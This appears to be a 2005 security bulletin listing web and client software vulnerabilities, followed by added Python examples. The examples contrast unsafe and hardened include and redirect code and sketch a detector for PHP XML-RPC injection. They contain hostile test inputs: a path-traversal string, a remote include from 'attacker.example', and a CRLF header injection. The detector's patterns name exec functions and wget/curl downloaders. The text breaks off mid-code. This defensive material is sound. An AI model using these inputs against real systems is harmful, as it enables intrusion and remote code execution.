Flash 7.0.19 .0 & prior | An input validation vulnerability has been reported in 'ActionDefineFunction' due to an error for a critical array index value, which could let a remote malicious user cause a Denial of Service or execute arbitrary code. Update information available at: A Proof of Concept exploit has been published. | Macromedia Flash Input Validation | High | Macromedia Security Bulletin, MPSB05-07, November 7, 2005 |
Netscape 8.0.3.3, 7.2; | A buffer overflow vulnerability has been reported due to an error when handling IDN URLs that contain the 0xAD (soft hyphen) character in the domain name, which could let a remote malicious user execute arbitrary code. Patches available from: RedHat (http://rhn.redhat.com/), Fedora, Ubuntu, Gentoo, Slackware, Gentoo, Conectiva, Fedora, Debian, TurboLinux, Mandriva, HP (HPSBUX01231 Rev.1), Netscape, Debian (http://security.debian.). HP (HPSBUX01231 Rev.2: HP-UX Mozilla Remote Unauthorized Execution of Privileged Code or Denial of Service (DoS)) details the availability of version 1.7.12.01 of Mozilla for various HP platforms; users should see the referenced advisory or contact HP for further information. A Proof of Concept exploit script has been published. | Mozilla/Netscape/ Firefox Browsers Domain Name Buffer Overflow | High | Security Focus, Bugtraq ID: 14784, September 10, 2005 RedHat Security Advisories, 769-8 & RHSA-2005:768-6, September 9, 2005 Fedora Update Notifications, Ubuntu Security Notice, USN-181-1, September 12, 2005 Gentoo Linux Security Advisory GLSA 200509-11, September 18, 2005 Security Focus, Bugtraq ID: 14784, September 22, 2005 Slackware Security Advisory, SSA:2005-269-01, September 26, 2005 Gentoo Linux Security Advisory [UPDATE], GLSA 200509-11:02, September 29, 2005 Conectiva Linux Announcement, CLSA-2005:1017, September 28, 2005 Fedora Update Notifications, Debian Security Advisory, DSA 837-1, October 2, 2005 Turbolinux Security Advisory, TLSA-2005-93, October 3, 2005 HP Security Bulletin, Mandriva Linux Security Update Advisory, MDKSA-2005:174, October 6, 2005 HP Security Bulletin, Debian Security Advisories, DSA 866-1 & 868-1, October 20, 2005 HP Security Bulletin, |
MandrakeSoft Linux Mandrake 2006.0 x86_64, 2006.0, 10.2 x86_64, 10.2; | A vulnerability has been reported in the Ethereal IRC protocol dissector that could let remote malicious users cause a Denial of Service. Mandriva: Gentoo: SUSE: Conectiva: Currently we are not aware of any exploits for this vulnerability. | Ethereal Denial of Service | Low | Mandriva Linux Security Advisory, MDKSA-2005:193-1, October 26, 2005 Gentoo Linux Security Advisory, GLSA 200510-25, October 30, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 Conectiva Security Announcement, CLSA-2005:1043, November 8, 2005 |
Mozilla Firefox 1.5 beta 1 & beta 2, 1.0-1.0.7, 0.10.1, 0.10, 0.9-0.9.3, 0.8, Firefox Preview Release; Browser 1.8 Alpha 1-Alpha 4, 1.7-1.7.12, 1.6, 1.5.1, 1.5, 1.4.4, 1.4.2, 1.4.1, 1.4 1 & b, 1.4, 1.3.1, 1.3, 1.2.1, 1.2, Alpha & Beta, 1.1, Alpha & Beta, 1.0-1.0.2, 0.9.48, 0.9.35, 0.9.2-0.9.9, 0.8, M16, M15; KDE Konqueror Embedded 0.1, Konqueror 3.3-3.3.2, 3.2.3, 3.2.2 -6, 3.2.1, 3.1-3.1.5, 3.0.5 b, 3.0.5, 3.0- 3.0.3, 2.2.2, 2.2.1, 2.1.2, 2.1.1 | A vulnerability has been reported due to a failure to ensure that cookies are properly associated to domain names, which could let a remote malicious user obtain sensitive information. No workaround or patch available at time of publishing. There is no exploit code required. | Multiple Vendor Web Browser Cookie Hostname Information Disclosure | Medium | Security Focus, Bugtraq ID: 15331, November 4, 2005 |
PHPXMLRPC 1.1.1; | A vulnerability has been reported in XML-RPC due to insufficient sanitization of certain XML tags that are nested in parsed documents being used in an 'eval()' call, which could let a remote malicious user execute arbitrary PHP code. PHPXMLRPC : Pear: Drupal: eGroupWare: MailWatch: Nucleus: RedHat: Ubuntu: Mandriva: Gentoo: http://security.gentoo http://security.gentoo. Fedora: Debian: SUSE: Gentoo: http://security.gentoo. Slackware: Debian: SGI: Slackware: Gentoo: Debian: Debian: Conectiva: b2evolution: There is no exploit code required. | PHPXMLRPC and PEAR XML_RPC Remote Arbitrary Code Execution | High | Security Focus, Bugtraq ID 14560, August 15, 2005 Security Focus, Bugtraq ID 14560, August 18, 2005 RedHat Security Advisory, RHSA-2005:748-05, August 19, 2005 Ubuntu Security Notice, USN-171-1, August 20, 2005 Mandriva Linux Security Update Advisory, MDKSA-2005:146, August 22, 2005 Gentoo Linux Security Advisory, GLSA 200508-13 & 14, & 200508-18, Fedora Update Notifications, Debian Security Advisory, DSA 789-1, August 29, 2005 SUSE Security Announcement, SUSE-SA:2005:049, August 30, 2005 Gentoo Linux Security Advisory, GLSA 200508-20 & 200508-21, August 30 & 31, 2005 Slackware Security Advisory, SSA:2005-242-02, August 31, 2005 Debian Security Advisory, DSA 798-1, September 2, 2005 SUSE Security Announcement, SUSE-SA:2005:051, September 5, 2005 SGI Security Advisory, 20050901-01-U, September 7, 2005 Slackware Security Advisories, SSA:2005-251-03 & 251-04, September 9, 2005 Gentoo Linux Security Advisory, GLSA 200509-19, September 27, 2005 Debian Security Advisory, DSA 840-1, October 4, 2005 Debian Security Advisory, DSA 842-1, October 4, 2005 Conectiva Linux Announcement, CLSA-2005:1024, October 7, 2005 Security Focus, Bugtraq ID: 14560, November 7, 2005 |
PunBB 1.2.1-1.2.9; | Several vulnerabilities have been reported: an HTML injection vulnerability was reported when uploading images due to insufficient sanitization of user-supplied input before using in dynamically generated content, which could let a remote malicious user execute arbitrary HTML and script code; a vulnerability was reported because a client can hide its real address by supplying an 'X_FORWARDED_FOR' field in the HTTP header, which could let a remote malicious user spoof the origin; and an unspecified information disclosure vulnerability was reported. PunBB: Blog:CMS: There is no exploit code required. | PunBB/Blog:CMS HTML Injection, Origin Spoof & Information Disclosure | Medium | Security Focus, Bugtraq IDs: 15322, 15326, & 15328, November 4, 2005 |
RedHat Fedora Core4, Core3; PHP 5.0.4, 4.3.9 | A remote Denial of Service vulnerability has been reported when parsing EXIF image data contained in corrupt JPEG files. Fedora: Currently we are not aware of any exploits for this vulnerability. | PHP Group Exif Module Remote Denial of Service | Low | Fedora Update Notifications, FEDORA-2005-1061 & 1062, November 8, 2005 |
RedHat Fedora Core4, Core3; | Several vulnerabilities have been reported: a remote Denial of Service vulnerability was reported in the ISAKMP, FC-FCS, RSVP, and ISIS LSP dissectors; a remote Denial of Service vulnerability was reported in the IrDA dissector; a buffer overflow vulnerability was reported in the SLIMP3, AgentX, and SRVLOC dissectors, which could let a remote malicious user execute arbitrary code; a remote Denial of Service vulnerability was reported in the BER dissector; a remote Denial of Service vulnerability was reported in the SigComp UDVM dissector; a remote Denial of Service vulnerability was reported due to a null pointer dereference in the SCSI, sFlow, and RTnet dissectors; a vulnerability was reported because a remote malicious user can trigger a divide by zero error in the X11 dissector; a vulnerability was reported because a remote malicious user can cause an invalid pointer to be freed in the WSP dissector; a remote Denial of Service vulnerability was reported if the 'Dissect unknown RPC program numbers' option is enabled (not the default setting); and a remote Denial of Service vulnerability was reported if SMB transaction payload reassembly is enabled (not the default setting). Upgrades available at: Fedora: RedHat: Mandriva: Avaya: Gentoo: SUSE: An exploit script has been published. | Ethereal Multiple Protocol Dissector Vulnerabilities CVE-2005-3184 | High | Ethereal Security Advisory, enpa-sa-00021, October 19, 2005 Fedora Update Notifications, RedHat Security Advisory, RHSA-2005:809-6, October 25, 2005 Mandriva Linux Security Advisory, MDKSA-2005:193, October 25, 2005 Avaya Security Advisory, ASA-2005-227, October 28, 2005 Gentoo Linux Security Advisory, GLSA 200510-25, October 30, 2005 Mandriva Linux Security Advisory, MDKSA-2005:193-2, October 31, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 |
University of Kansas Lynx 2.8.6 dev.1-dev.13, 2.8.5 dev.8, 2.8.5 dev.2-dev.5, 2.8.5, 2.8.4 rel.1, 2.8.4, 2.8.3 rel.1, 2.8.3 pre.5, 2.8.3 dev2x, 2.8.3 dev.22, 2.8.3, 2.8.2 rel.1, 2.8.1, 2.8, 2.7; | A buffer overflow vulnerability has been reported in the 'HTrjis()' function when handling NNTP article headers, which could let a remote malicious user execute arbitrary code. University of Kansas Lynx: Gentoo: Ubuntu: RedHat: Fedora: Mandriva: Conectiva: Trustix: SGI: Mandriva: Debian: http://security.debian. Ubuntu: SUSE: Slackware: SCO: A Proof of Concept Denial of Service exploit script has been published. | Lynx 'HTrjis()' NNTP Remote Buffer Overflow | High | Gentoo Linux Security Advisory, GLSA 200510-15, October 17, 2005 Ubuntu Security Notice, USN-206-1, October 17, 2005 RedHat Security Advisory, RHSA-2005:803-4, October 17, 2005 Fedora Update Notifications, Mandriva Linux Security Update Advisory, MDKSA-2005:186, October 18, 2005 Conectiva Linux Announcement, CLSA-2005:1037, October 19, 2005 Trustix Secure Linux Security Advisory, TSLSA-2005-0059, October 21, 2005 SGI Security Advisory, 20051003-01-U, October 26, 2005 Mandriva Linux Security Advisory, MDKSA-2005:186-1, October 26, 2005 Debian Security Advisories, DSA 874-1 & 876-1, October 27, 2005 Ubuntu Security Notice, USN-206-2, October 29, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 Slackware Security Advisory, SSA:2005-310-03, November 7, 2005 SCO Security Advisory, SCOSA-2005.47, November 8, 2005 |
Xoops 2.0.10-2.0.12, 2.0.9.3, 2.0.9.2, 2.0.5-2.0.5.2, 2.0-2.0.3; | A vulnerability was reported due to insufficient sanitization of input passed to an 'eval()' call, which could let a remote malicious user execute arbitrary PHP code. Drupal: Mandriva: Pear: PhpMyFaq: S9Y Serendipity: Trustix: http://http.trustix.org/pub/trustix/updates/ WordPress: XML-RPC: Xoops: Gentoo: http://security.gentoo.org/ Fedora: Ubuntu: Debian: http://security.debian.org/ SGI: SuSE: Trustix: Debian: SUSE: MAXdev MD-Pro Content Management: b2evolution: Exploit scripts have been published. | Multiple Vendors XML-RPC for PHP Remote Code Injection | High | Security Focus, 14088, June 29, 2005 Gentoo Linux Security Advisory, GLSA 200507-01, July 3, 2005 Fedora Update Notifications, Ubuntu Security Notice, USN-147-1 & USN-147-2, July 05 & 06, 2005 Gentoo Linux Security Advisory, GLSA 200507-06, July 6, 2005 Gentoo Linux Security Advisory, GLSA 200507-07, July 10, 2005 SuSE Security Announcement, SUSE-SA:2005:041, July 8, 2005 Debian Security Advisories, DSA 745-1, 747-1, & DSA 746-1, July 10 & 13, 2005 Trustix Secure Linux Security Advisory, TSLSA-2005-0036, July 14, 2005 SGI Security Advisory, 20050703-01-U, July 15, 2005 Gentoo Linux Security Advisory, GLSA 200507-15, July 15, 2005 Debian Security Advisory, DSA 789-1, August 29, 2005 SUSE Security Announcement, SUSE-SA:2005:049, August 30, 2005 Security Focus, Bugtraq ID: 14088, November 7, 2005 |
OSTE 1.x | A vulnerability has been reported in 'index.php' due to insufficient verification of the 'page' and 'site' parameters before they are used to include files, which could let a remote malicious user include and execute arbitrary remote PHP code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | OSTE File Inclusion Vulnerability | High | Secunia Advisory: SA17493, November 8, 2005 |
PHP Handicapper | Multiple vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported in 'process_signup. No workaround or patch available at time of publishing. There is no exploit code required. | PHP Handicapper Cross-Site Scripting & SQL Injection | Medium | Secunia Advisory: SA17412, November 3, 2005 |
PHP 4.0.x, 4.1.x, 4.2.x, 4.3.x, 4.4.x, 5.0.x | Multiple vulnerabilities have been reported: a vulnerability was reported due to insufficient protection of the 'GLOBALS' array, which could let a remote malicious user define global variables; a vulnerability was reported in the 'parse_str()' PHP function when handling an unexpected termination, which could let a remote malicious user enable the 'register_ Upgrades available at: SUSE: Fedora: There is no exploit code required. | PHP Multiple Vulnerabilities CVE-2005-3388 | Medium | Secunia Advisory: SA17371, October 31, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 Fedora Update Notifications, |
phpBB 2.0-2.0.18, 1.4.4, 1.4.0-1.4.2, 1.2.1, 1.2.0, 1.0.0 | A Cross-Site Scripting vulnerability has been reported in 'usercp_sendpasswd.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | PHPBB Forum Cross-Site Scripting | Medium | Security Focus, Bugtraq ID: 15357, November 8, 2005 |
PHPFM | A file upload vulnerability has been reported, which could let a remote malicious user execute arbitrary code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | PHPFM Arbitrary File Upload | Medium | Security Focus, Bugtraq ID: 15335, November 7, 2005 |
PHPKIT 1.6.1 R2 & prior | Multiple vulnerabilities have been reported: a vulnerability was reported due to insufficient sanitization of unspecified input, which could let a remote malicious user execute arbitrary HTML and script code; a vulnerability was reported in 'admin/admin.php' due to insufficient sanitization of the 'site_body' parameter before returning it to the user, which could let a remote malicious user execute arbitrary HTML and script code; a vulnerability was reported due to insufficient sanitization of the Referer HTTP header, which could let a remote malicious user execute arbitrary HTML and script code; an SQL injection vulnerability was reported due to insufficient sanitization of the 'id' and 'PHPKITSID' parameters before they are used in an SQL query, which could let a remote malicious user execute arbitrary SQL code; a vulnerability was reported in the 'path' parameter in various scripts due to insufficient verification before it is used to include files, which could let a remote malicious user execute arbitrary PHP code; and a vulnerability was reported due to insufficient sanitization of input passed to an 'eval()' call, which could let a remote malicious user execute arbitrary PHP code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | PHPKit Multiple Input Validation | High | Hardened PHP Project Security Advisory, November 7, 2005 |
PHPList Mailing List Manager 2.10.1, 2.8.12, 2.6-2.6.4 | Multiple vulnerabilities have been reported: a vulnerability was reported because users can access other users' personal details; a vulnerability was reported in the sign up process, which could let a remote malicious user obtain access without providing a password; a vulnerability was reported due to insufficient sanitization of some input in the administration interface before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code; an SQL injection vulnerability was reported due to insufficient sanitization of some input in the administration interface before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code; and a vulnerability was reported due to insufficient sanitization of some input passed in the administration interface before displaying, which could let a remote malicious user obtain sensitive information. Upgrades available at: There is no exploit code required; however, Proof of Concept exploits have been published. | PHPList Multiple Input Validation | Medium | Secunia Advisory: SA17476, November 8, 2005 |
PhpWebThings 0.4.4 | Several vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported in 'forum.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code; and an SQL injection vulnerability was reported in 'forum.php' due to insufficient sanitization of user-supplied input before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code. No workaround or patch available at time of publishing. There is no exploit code required; however, Proof of Concept exploits have been published. | phpWebThings Cross-Site Scripting & SQL Injection | Medium | Security Focus, Bugtraq ID: 15276 & 15277, November 2, 2005 |
SAP Web Application Server 7.0, 6.40, 6.20, 6.10 | Several vulnerabilities have been reported: an HTTP response splitting vulnerability was reported due to insufficient sanitization of user-supplied input, which could let a remote malicious user inject arbitrary headers and content into the server's response; several Cross-Site Scripting vulnerabilities were reported due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code; and a URI redirection vulnerability was reported in the 'sap-exiturl' parameter, which could let a remote malicious user steal cookie-based credentials or enhance phishing style attacks. The vendor has released solutions and patch information regarding this issue. Users are advised to contact the vendor for further information. There is no exploit code required; however, Proof of Concept exploits have been published for the Cross-Site Scripting & URI Redirection vulnerabilities. | SAP Web Application Server HTTP Response Splitting, Cross-Site Scripting & URI Redirection | Medium | Security Focus, Bugtraq ID: 15360, 15361, & 15362, November 9, 2005 |
Scorched 3D 39.1, 37.1, 37.0, 36.0-36.2, 35.0 | Multiple vulnerabilities have been reported: a buffer overflow vulnerability was reported due to boundary and format string errors in various functions, which could let a remote malicious user execute arbitrary code; a vulnerability was reported in 'ServerConnect No workaround or patch available at time of publishing. A Proof of Concept exploit has been published. | Scorched 3D Multiple Vulnerabilities | High | Secunia Advisory: SA17423, November 4, 2005 |
Movable Type 3.17, 3.16, 3.2, 2.63, 2.0 | Several vulnerabilities have been reported: a vulnerability was reported due to insufficient sanitization of user-supplied input, which could let a remote malicious user create an arbitrary blog path; and a vulnerability was reported due to insufficient sanitization of user-supplied input before using in dynamically generated content, which could let a remote malicious user execute arbitrary HTML and script code. There is no exploit code required. Currently we are not aware of any exploits for these vulnerabilities. | Movable Type Arbitrary Blog Creation Path & Entry Posting HTML Injection | Medium | Security Focus, Bugtraq ID: 15302 & 15305, November 3, 2005 |
SquirrelMail 1.4.0-1.4.5-RC1. | A vulnerability has been reported in 'options_identities.php' because parameters are insecurely extracted, which could let a remote malicious user execute arbitrary HTML and script code, or obtain/ Upgrades available at: Debian: RedHat: Apple: Fedora: Fedora: Mandriva: There is no exploit code required. | SquirrelMail Variable Handling | Medium | GulfTech Security Research Debian Security Advisory, RedHat Security Advisory, RHSA-2005:595-12, August 3, 2005 Apple Security Update 2005-007, Fedora Update Notifications, Fedora Legacy Update Advisory, FLSA:163047, September 15, 2005 Mandriva Linux Security Advisory, MDKSA-2005:202, November 2, 2005 |
JDK (Windows Production Release) 1.5.0_05, 1.4.2_09, 1.4.2_08, JDK (Solaris Production Release) 1.5.0_05, 1.4.2_09, 1.4.2_08, JDK (Linux Production Release) 1.5.0_05, 1.4.2_09, 1.4.2_08, JDK 1.5.0_05, 1.4.2_09, 1.4.2_08 | A remote Denial of Service vulnerability has been reported due to a font deserialization error. No workaround or patch available at time of publishing. Currently we are not aware of any exploits for this vulnerability. | Sun Java Development Kit Font Serialization Remote Denial of Service | Low | Security Focus, Bugtraq ID: 15312, November 4, 2005 |
XMB Forum 1.9.3 | A Cross-Site Scripting vulnerability has been reported in 'u2u.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | XMB Cross-Site Scripting | Medium | Security Focus, Bugtraq ID: 15342, November 7, 2005 |
XMB Forum 1.9.3 | An SQL injection vulnerability has been reported in 'post.php' due to insufficient sanitization of user-supplied input before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | XMB Forum SQL Injection | Medium | Security Focus, Bugtraq ID: 15267, November 1, 2005 |
toendaCMS 0.6.1 | Several vulnerabilities have been reported: a Directory Traversal vulnerability was reported in 'admin.php' due to insufficient verification of the 'id_user' parameter before it is used to display files, which could let a remote malicious user obtain sensitive information; and a vulnerability was reported because user credentials and session information are stored inside the web root, which could let a remote malicious user obtain sensitive information. Upgrade available at: There is no exploit code required; however, a Proof of Concept exploit has been published. | toendaCMS Information Disclosure | Medium | SEC-CONSULT Security Advisory, November 7, 2005 |
NetBackup Server 5.1, 5.0, NetBackup Enterprise Server 5.1, 5.0, NetBackup Client 5.1, 5.0 | A buffer overflow vulnerability has been reported in a shared library used by the VERITAS NetBackup volume manager daemon (vmd), which could let a remote malicious user potentially execute arbitrary code or cause a Denial of Service. Patches available at: Currently we are not aware of any exploits for this vulnerability. | VERITAS NetBackup Volume Manager Daemon Buffer Overflow | High | Symantec Security Advisory, SYM05-024, November 8, 2005 |
Vubb | Several vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported in 'index.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code; and a path disclosure vulnerability was reported when an error message is displayed, which could let a remote malicious user obtain sensitive information. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit script has been published. | VUBB Cross-Site Scripting & Path Disclosure | Medium | KAPDA Advisory :#10, November 1, 2005 |
Cerberus Helpdesk 2.6.1, 2.0-2.5 | A vulnerability has been reported in the 'attachment_ No workaround or patch available at time of publishing. There is no exploit code required. | Cerberus Helpdesk Information Disclosure | Medium | Security Tracker Alert ID: 1015153, November 4, 2005 |
YaBB 2.0, RC1 & RC2, 1.41, 1.40, YaBB 1 Gold Release, SP 1.4, SP 1.3-1.3.2, SP 1.2, SP 1 | A vulnerability has been reported in the attachment upload handling due to an input validation error, which could let a remote malicious user execute arbitrary HTML and script code. Upgrades available at: There is no exploit code required. | YaBB Image Upload HTML Injection | Medium | Secunia Advisory: SA17411, November 9, 2005 |
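Several entries in the table above turn on the same two handling mistakes: the OSTE, PHPKit and toendaCMS entries use a request parameter ('page', 'site', 'path', 'id_user') as a file path without checking where it points, and the SAP entry copies a parameter ('sap-exiturl') into a redirect without checking its target or stripping CR/LF. The following is an added example, not code from any of those products or from the bulletin, showing each mistake in its unsafe form next to a hardened form. The include directory, the page allowlist and the trusted redirect host are hypothetical.

```python
"""Added example (not code from OSTE, PHPKit, toendaCMS or SAP): the two
locator-handling mistakes behind several entries in this bulletin, each as
the unsafe form and a hardened form.

1. File inclusion / directory traversal: a request parameter is joined onto
   a filesystem path and included or displayed without a containment check.
2. URI redirection / HTTP response splitting: a request parameter becomes a
   Location header value without target or control-character checks.

PAGE_DIR, ALLOWED_PAGES and TRUSTED_REDIRECT_HOSTS are hypothetical.
"""
import os
from typing import List, Optional
from urllib.parse import urlsplit

PAGE_DIR = "/var/www/app/pages"                  # hypothetical include directory
ALLOWED_PAGES = {"home", "news", "contact"}      # hypothetical page allowlist
TRUSTED_REDIRECT_HOSTS = {"portal.example.com"}  # hypothetical redirect targets


def unsafe_include_target(page: str) -> str:
    """Vulnerable pattern: concatenate and include. '../../../../etc/passwd'
    walks out of PAGE_DIR, and in PHP with URL includes enabled a value such
    as 'http://attacker.example/shell.txt?' pulls in remote code."""
    return PAGE_DIR + "/" + page + ".php"


def resolve_in_base(base: str, relative: str) -> Optional[str]:
    """Containment check: canonicalise, then insist the result stays under
    base. Catches '..' sequences and absolute paths (os.path.join discards
    base when its second argument is absolute)."""
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, relative))
    if os.path.commonpath([base_real, target]) != base_real:
        return None
    return target


def safe_include_target(page: str) -> Optional[str]:
    """Allowlist first (the fix the file-inclusion entries need), then the
    containment check as defence in depth against allowlist drift."""
    if page not in ALLOWED_PAGES:
        return None
    return resolve_in_base(PAGE_DIR, page + ".php")


def unsafe_location_header(exit_url: str) -> List[str]:
    """Vulnerable pattern: the raw parameter becomes the header value. A CR/LF
    inside it ends the header and lets the attacker append headers or a body,
    which is the response-splitting shape. Returns the resulting header lines
    so the damage is visible."""
    return ("Location: " + exit_url).split("\r\n")


def safe_redirect_location(exit_url: str) -> Optional[str]:
    """Reject control characters, then allow only a same-site relative path or
    an absolute http(s) URL whose host is on the allowlist."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in exit_url):
        return None                          # CR/LF etc.: response splitting
    if exit_url.startswith("/") and not exit_url.startswith(("//", "/\\")):
        return exit_url                      # relative path on this site
    parts = urlsplit(exit_url)
    if parts.scheme not in ("http", "https"):
        return None                          # javascript:, data:, ...
    if parts.hostname not in TRUSTED_REDIRECT_HOSTS:
        return None                          # open redirect / phishing target
    return exit_url


if __name__ == "__main__":
    for p in ("news", "../../../../etc/passwd", "http://attacker.example/shell.txt?"):
        print(f"{p!r:40} unsafe={unsafe_include_target(p)!r} safe={safe_include_target(p)!r}")
    for u in ("https://portal.example.com/logout",
              "http://attacker.example/",
              "http://portal.example.com/\r\nSet-Cookie: session=attacker"):
        print(f"{u!r:62} lines={len(unsafe_location_header(u))} safe={safe_redirect_location(u)!r}")
```

The allowlist does the real work for includes; the realpath containment check is there for the day someone adds a name to the allowlist that contains a separator. For redirects, the host check is compared against `urlsplit().hostname`, not a prefix of the string, so `http://portal.example.com@attacker.example/` is rejected as well as `//attacker.example/`.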
Wireless
The section below contains wireless vulnerabilities, articles, and viruses/trojans identified during this reporting period.
- IDC: As mobile workforce grows, IT support could lag: According to a study by IDC, the global mobile workforce is expected to grow by more than 20% in the next four years, with 878 million mobile workers toiling away on laptops, handhelds and cell phones by 2009. However, IT managers today often do not deal with the complexities associated with managing, securing and supporting handheld devices and applications for mobile workers. Source: http://www.computerworld.com/mobiletopics/mobile/story/0,10801,106062,00.html
- Agencies jockey over wireless spectrum: By the end of this month, federal agencies will release to the Commerce Department plans on how they will manage their allotment of the nation's airwaves. Since President Bush unveiled a sweeping spectrum management memorandum last December that included 24 recommendations and key milestones, federal agencies have been scrambling to determine how much of the electromagnetic spectrum they are using and for what purposes. Source: http://www.gcn.com/vol1_no1/daily-updates/37475-1.html
- New type of phishing could hit mobile phone users: Experts are warning of a new type of phishing that could siphon bank details from mobile phone users. Mophophishing is where hackers send out fake banking applications to unsuspecting mobile phone users. The users then type their account details into the application, thinking they are accessing their accounts when they are actually sending their personal details back to the hacker. Spotting a phishing email is relatively straightforward: the user need only examine the source code of an HTML email and inspect the domain name and path of any link to verify its authenticity. With a mobile application, however, this information is concealed deep within the application code itself. Source: http://www.scmagazine.com/uk/news/article/525582/new-type-phishing-hit-mobile-phone-users/
Wireless Vulnerabilities
- Cisco flaw puts Wi-Fi networks at risk: This problem affects large Wi-Fi networks and occurs when Cisco 1200, 1131 and 1240 series Wi-Fi access points are controlled by Cisco 2000 and 4400 series Airespace Wireless LAN Controllers. Source: http://news.com.com/Cisco+flaw+puts+Wi-Fi+networks+at+risk/2100-7349_3-5929059.html?tag=cd.top
- ssf.zip: A VoIP Phone exploit tool.
- WifiScanner-1.0.1.tar.gz: An analyzer and detector of 802.11b stations and access points.
- phzine01.zip: Phearless Serbian/Croatian Security Magazine Issue #01.
Recent Exploit Scripts/Techniques
The table below contains a sample of exploit scripts and "how to" guides identified during this period. The "Workaround or Patch Available" column indicates if vendors, security vulnerability listservs, or Computer Emergency Response Teams (CERTs) have published workarounds or patches.
Note: At times, scripts/techniques may contain names or content that may be considered offensive.
Trends
- Spyware Has Become A "Global Pandemic" For Enterprises: Survey: A new study by Webroot Software found that 48% of enterprise PCs are infected with adware. They found that the average enterprise PC had 3.9 adware infections in the third quarter of this year, up from 3.6 in the previous quarter. Source: http://www.networkingpipeline.com/showArticle.jhtml?articleID=173600626
- New Linux worm crawls the web: A new Linux worm is crawling the web looking for a large number of vulnerable PHP systems and applications. The worm, known as Linux.Plupii (Symantec) or Linux/Lupper.worm (McAfee), installs a Trojan using wget; the attack allows arbitrary code execution under the privileges of the web server user. The worm exploits PHP based vulnerabilities discovered back in June, and affects a large number of PHP web applications that use XML-RPC. Source: http://www.securityfocus.com/brief/38
- US-CERT is currently aware of a new worm which targets web servers running vulnerable versions of XML-RPC for PHP. Once the worm infects a web server, it opens a backdoor to the compromised server and begins scanning for additional servers to infect.
- Phishing Alert: Google: Websense Security Labs has received reports of a new phishing attack that targets users of Google's search engine. Users are redirected to a spoofed copy of Google's front page with a large message claiming "You WON $400.00 !!!". They are presented with instructions for collecting their prize money, which include entering credit card numbers and shipping addresses. Once the information has been collected, users are directed to Google's legitimate website. Source: http://www.websensesecuritylabs.com/alerts/alert.php?AlertID=332
- Online ID theft worsens, scares U.S. bank customers: Banks and regulators have increased their efforts to stop identity theft over the Internet, but many Americans fear that fraudsters remain one step ahead when banking online. Source: http://www.computerworld.com/securitytopics/security/story/0,10801,106066,00.html
- Hey Linux Users: No Software Is Impenetrable: The vulnerability that affects a Windows network today is very likely to infect a Linux or Unix network connected to it. Companies that fail to secure their Linux networks may find rogue code spreading and infecting interconnected Windows networks. Source: http://www.newsfactor.com/story.xhtml?story_id=02000000GPIG
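The XML-RPC for PHP entry in the vulnerability table and the Linux.Plupii / Lupper items in this section describe the same flaw: the library assembled a PHP expression from decoded request fields and passed it to eval(), so a field whose text closes the quoted string is executed as PHP, and the worm then fetches its Trojan with wget. The following is an added example, not part of the bulletin, the XML-RPC library or the worm: a detector over XML-RPC request bodies that flags the string breakout and a downloader invocation. The request bodies are constructed rather than captured, the regular expressions are my own heuristics, and 192.0.2.10 is a documentation address.

```python
"""Added example (not code from XML-RPC for PHP, the bulletin or the worm):
flag XML-RPC request bodies that carry a PHP eval() string breakout or a
downloader command. Sample bodies are constructed; the IP address is from
the RFC 5737 documentation range."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, Iterator, List, Tuple

# Constructed heuristics. A quote followed by ')' and ';' closes the string
# argument inside an eval()'d expression and starts a new statement; the
# second alternative catches a statement separator followed by a PHP
# execution or inclusion function.
BREAKOUT = re.compile(
    r"""['"]\s*\)\s*;|;\s*(system|exec|passthru|shell_exec|eval|phpinfo|include|require)\s*\(""",
    re.IGNORECASE,
)
# The stage-two fetch the Trends item describes (the worm installs a Trojan
# using wget); curl/lynx/fetch are added on the same pattern.
DOWNLOADER = re.compile(r"\b(wget|curl|lynx|fetch)\b[^;|&]*https?://", re.IGNORECASE)


def text_nodes(body: bytes) -> Iterator[Tuple[str, str]]:
    """Yield (tag, text) for every element with non-blank text. ElementTree
    does not fetch external entities, so a hostile body cannot make the
    detector itself call out."""
    root = ET.fromstring(body)
    for element in root.iter():
        if element.text and element.text.strip():
            yield element.tag, element.text


def classify_request(body: bytes) -> Dict[str, object]:
    """Return a verdict ('benign', 'attack' or 'malformed') plus the fields
    that matched. Every text node is checked, not only <methodName>, because
    the eval'd string was assembled from decoded parameter values as well."""
    findings: List[str] = []
    try:
        nodes = list(text_nodes(body))
    except ET.ParseError as exc:
        return {"verdict": "malformed", "findings": [f"unparseable XML: {exc}"]}
    for tag, text in nodes:
        if BREAKOUT.search(text):
            findings.append(f"<{tag}>: PHP string breakout")
        if DOWNLOADER.search(text):
            findings.append(f"<{tag}>: downloader invocation")
    return {"verdict": "attack" if findings else "benign", "findings": findings}


# Constructed sample bodies: an ordinary blogging API call and an injected
# struct member whose name breaks out of the eval'd string.
BENIGN_BODY = (
    b"<?xml version='1.0'?><methodCall><methodName>blogger.getUsersBlogs</methodName>"
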